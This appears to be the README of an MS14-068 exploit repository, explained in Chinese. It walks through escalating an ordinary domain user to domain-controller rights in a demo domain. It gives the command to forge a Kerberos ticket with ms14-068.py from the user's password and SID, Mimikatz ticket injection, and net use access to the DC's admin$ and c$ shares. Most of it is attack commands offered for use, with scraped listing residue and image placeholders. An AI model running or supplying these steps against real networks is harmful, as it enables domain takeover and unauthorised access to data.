2022-02-24 17:57:42 +08:00
..
2022-02-24 17:57:42 +08:00
2022-02-24 17:57:42 +08:00
2022-02-24 17:57:42 +08:00
2022-02-24 17:57:42 +08:00
2022-02-24 17:57:42 +08:00

MS14-068

将普通域用户权限提升为域控权限  
漏洞利用后netuse \\swg.server.com\c$可以直接访问域控的网络资源

Vulnerability reference:

Usage

域管理员:DCwin03 域名:demo.com 普通域用户:hx

登录普通域用户hxcmd中输入"whoami/user"获取sid
demo/hx S-1-5-21-3813283032-1038476579-1047458262-1110

x1
x2

退出域用户hx登录本地用户123

python ms14-068.py -u hx@demo.com -p pwd_of_hx -s S-1-5-21-3813283032-1038476579-1047458262-1110 -d DCwin03.demo.com  

x3 x4

c:\User\123>Mimikatz.exe "kerberos::ptc TGT_hx@demo.com.ccache" exit  
  
net use \\DCwin03\admin$  

dir \\DCwin03\c$

References